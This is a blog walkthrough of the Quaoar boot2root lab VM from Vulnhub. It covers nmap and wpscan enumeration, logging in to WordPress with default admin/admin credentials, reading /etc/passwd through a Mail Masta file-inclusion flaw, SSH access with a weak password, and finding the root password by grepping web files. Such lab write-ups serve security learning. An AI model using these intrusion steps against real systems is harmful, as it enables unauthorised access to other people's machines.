Saturday, April 1, 2017

hackfest2016: Quaoar - Vulnhub Walk Through


This is the first boot2root box I’ll be tackling in a series of boot2roots I’ll be doing to learn. I chose this one because it’s new, it’s beginner stage, and it’s got some helpful hints on Vulnhub to get you started. I’ll be documenting my findings and doing a write up of every box I attempt to boot2root from Vulnhub or other sources. This is both for my benefit and others that might get stuck in the future. Beware that I will have spoilers in these as they show how I gained root on these boxes. I’m using Kali XFCE with 20 gigabytes of hard drive space and basic default settings from VMWare. Nothing to special. The host is a 2014 Macbook pro running the Intel i7 chip. Only the Kali and boot2root VM will be on the same network.


Nmap was one of the hints that the creator of this boot2root had mentioned to use so it’s where I started with. I almost always use the switches –Pn –sV –p1-65535 –A to start with on these boot2roots. Really deep dive the ports and grab headers. If this was a live pen test I likely wouldn’t make that much noise and would stick to top ports or try to find something more targeted from other sources first from pre-engagement. At any case the results of the nmap scan were as follows.
root@kali:~# nmap -Pn -sV -p1-65535 -A

Starting Nmap 7.25BETA1 ( ) at 2017-03-24 08:29 CDT
Nmap scan report for
Host is up (0.00041s latency).
Not shown: 65526 closed ports
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: capabilities STARTTLS more listed IDLE OK LOGIN-REFERRALS post-login Pre-login ENABLE ID LOGINDISABLEDA0001 LITERAL+ IMAP4rev1 SASL-IR have
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 more listed IDLE OK LOGIN-REFERRALS post-login capabilities ENABLE ID Pre-login LITERAL+ IMAP4rev1 SASL-IR have
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: 2017-03-24T13:30:07+00:00; 0s from scanner time.
MAC Address: 00:0C:29:C7:5D:11 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2017-03-24T09:30:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

1   0.41 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 58.23 seconds
From nmap we know that we have port 80 open, so next I went to the web browser to see what I could physically see. Nothing of interest there, so I went to DirBuster next as it was hinted to use from the description on VulnHub. I ran DirBuster with the url of http://172.x.x.x:80 and navigated to /usr/share/dirbuster/wordlist/directory-list-1.0.txt. I let this run for 1-2 hours. Once I started seeing the wordpress stuff I figured that’s more or less what the creator wanted me to find to pivot to another tool.
The next tool I will pivot to is wpscan. This will help us determine any vulnerabilities in the plugins and find all directories, themes, and plugins associated with the wordpress server. First lets make sure the database is up to date with a wpscan –update. Next is to run the actual wpscan agains the wordpress site ‘wpscan –url’. I had to add the /wordpress because that’s where the wordpress site begins. This gives me some useful information about themes and plugins available.
[+] URL:
[+] Started: Fri Mar 24 15:09:59 2017

[!] The WordPress '' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under:
[!] Upload directory has directory listing enabled:
[!] Includes directory has directory listing enabled:

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 8 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks by Default
[i] Fixed in: 3.9.15

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
[i] Fixed in: 3.9.16

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
[i] Fixed in: 3.9.17

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
[i] Fixed in: 3.9.17

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
 |  Location:
[!] The version is out of date, the latest version is 1.9
 |  Style URL:
 |  Referenced style.css: wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI:
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI:

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Fri Mar 24 15:10:02 2017
[+] Requests Done: 48
[+] Memory used: 17.445 MB
[+] Elapsed time: 00:00:02

So from wpscan we now know it’s running the default Wordpress theme of twentyfourteen. It also gives us some other useful information as in what version of Wordpress is running, known vulnerabilities for themes, versions, plugins, etc. But lets try to enumerate users to see if we can’t dig a little deeper. Lets use wpscan again for this ‘wpscan –url –enumerate u’
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    | Id | Login  | Name   |
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
[!] Default first WordPress username 'admin' is still used

Gaining Access

Interesting! Still using default ‘admin’ account. Wonder if that password has been reset from the default or if it’s using a weak password. Lets check on the wp-login.php page. with username ‘admin’ and password ‘admin’. Looks like the password worked! So lets explore just incase wpscan missed anything. Looks like we have 2 plugins of ‘hello dolly’ and ‘mail masta’. A quick google reviels that Mail Masta has a Local File Inclusion exploit associated with it and gives a PoC (proof of concept). Lets give it a try and see if we cannot find the
/etc/passwd file. 

BINGO! Alright so now we’ve got a list of users on this box we can try to brute force against or should we dive slightly deeper? Maybe also get /etc/shadow? Well that didn’t quite work, so lets look for more low hanging fruit. Lets see what useful information is in /etc/passwd. In this file we have some great information that goes like this

Great! So do we have any that have password listed or are the ally ‘x’ meaning that it’s being pulled from shadow file? Nope, doesn’t look that way. So we know that WordPress was pretty default and it looks like one of our users is wpadmin. Lets try and see if we can ssh into that with a default/weak password.
root@kali:/usr/share/dirbuster/wordlists# ssh wpadmin@
wpadmin@'s password: 
Permission denied, please try again.
wpadmin@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:

  System information as of Sat Mar 25 07:45:42 EDT 2017

  System load:  0.12              Processes:           108
  Usage of /:   37.6% of 7.21GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0:
  Swap usage:   11%

  Graph this data and manage this system at

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Oct 22 23:03:05 2016 from

BOOM! We’re in and got our first shell! Lets see where we’re at and what’s in this directory.
$ pwd
$ ls
$ cat flag.txt

Privilege Escalation

Ok so now what we have a shell we need to get some privilege escalation. One of the first places I tend to look is in the cron jobs to see what is running.
wpadmin@Quaoar:~$ pwd
wpadmin@Quaoar:~$ cd /etc/cron.
cron.d/       cron.daily/   cron.hourly/  cron.monthly/ cron.weekly/  
wpadmin@Quaoar:~$ cd /etc/cron.d
wpadmin@Quaoar:/etc/cron.d$ ls

So it looks like we have some stuff in cron.d which was first on the list. So lets take a look at whats in php5 file.
wpadmin@Quaoar:/etc/cron.d$ cat php5
# /etc/cron.d/php5: crontab fragment for php5
#  This purges session files older than X, where X is defined in seconds
#  as the largest value of session.gc_maxlifetime from all your php.ini
#  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
# Look for and purge old sessions every 30 minutes
09,39 *     * * *     root   [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete

What's that? Is that another hidden flag? "# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de". Interesting... Upon further reading of others walk throughs I confirmed that this is indeed the 3rd flag but we've still yet to get any privilege escalation so lets continue on.

So we know it's running a WordPress site and we know it's running Apache. So lets take a look at what's in /var/www/ to see if we find any hidden gems.
wpadmin@Quaoar:/$ cd var/www/
wpadmin@Quaoar:/var/www$ ls
CHANGELOG    index.html
hacker-manifesto-ethical.jpg  LICENSE
hacking.jpg    pososibo-ethical-hacking-hack-fond.jpg
hack-planet-1280-amox-zone.jpg  Quaoar.jpg
Hack_The_Planet2.jpg   robots.txt
Hack_The_Planet3.jpg   tomcat6-tomcat6-tmp
Hack_The_Planet.jpg   upload
hsperfdata_tomcat6   wordpress

Hmm lets cat through some of these files and see what's in them. Seems we have a lot of files to comb over so lets make this a little easier. What I ended up doing was using "grep" to look through multiple files at once.
wpadmin@Quaoar:/var/www$ grep "root" * -R | less

This allows us to look through all the files recursively for "root". Piping to less so we can comb over it all. I also went a step further and used some regex on less to look for "root:" which I suppose I could have done during the grep. I had to really comb over it since it was going through quite a few files but eventually I spotted this

Looks like 'root' has the password 'rootpassword!' so lets give that a try.

That's it! We got all 3 flags at this point. Hope you enjoyed this walk through.

No comments:

Post a Comment